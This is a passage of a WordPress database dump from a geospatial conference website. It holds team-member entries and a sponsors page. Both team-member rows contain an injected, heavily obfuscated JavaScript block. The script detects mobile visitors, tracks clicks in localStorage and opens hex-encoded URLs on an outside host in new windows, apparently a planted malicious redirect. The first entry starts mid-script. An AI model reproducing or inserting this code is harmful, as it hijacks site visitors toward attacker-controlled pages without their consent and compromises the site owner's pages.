_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. Alaa A. Abdelbary','','publish','closed','closed','','prof-dr-alaa-a-abdelbary-2','','','2023-06-18 13:39:35','2023-06-18 13:39:35','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4660',0,'dt_team','',0),
(4661,1,'2023-06-09 21:58:32','2023-06-09 21:58:32','<!-- wp:paragraph -->\n<p><strong>ISPRS Geospatial Week Director, The University of Calgary</strong></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Naser El-Sheimy','','publish','closed','closed','','prof-naser-el-sheimy','','','2023-06-18 13:38:26','2023-06-18 13:38:26','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4661',0,'dt_team','',0),
(4662,1,'2023-06-09 22:01:58','2023-06-09 22:01:58','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: 